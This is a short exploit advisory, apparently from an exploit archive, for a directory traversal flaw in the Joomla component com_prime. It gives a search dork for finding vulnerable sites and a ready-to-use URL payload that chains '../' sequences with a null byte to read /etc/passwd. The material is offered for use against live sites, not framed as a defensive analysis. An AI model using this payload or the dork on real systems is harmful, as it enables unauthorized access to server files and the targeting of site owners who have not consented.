id: 10686
date: 01/17/2010
title: Joomla Component com_prime Directory Traversal
author: Fl0riX
cves: 

==============================================
Joomla Component com_prime Directory Traversal
==============================================

@~~=======================================~~@
@~~=Script   : Joomla Component com_prime
 
@~~=Author   : FL0RiX
 
@~~=Bug Type : Directory Traversal
 
@~~=Dork : inurl:"index.php?option=com_prime"
 
@~~=Note: Kimseye Hakettiginden Fazla Deger Vermeyeceksin.
 
@~~=======================================~~@
 
@~~=Vuln.
 
http:/server/ [Yol] /index.php?option=com_prime&lang=../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #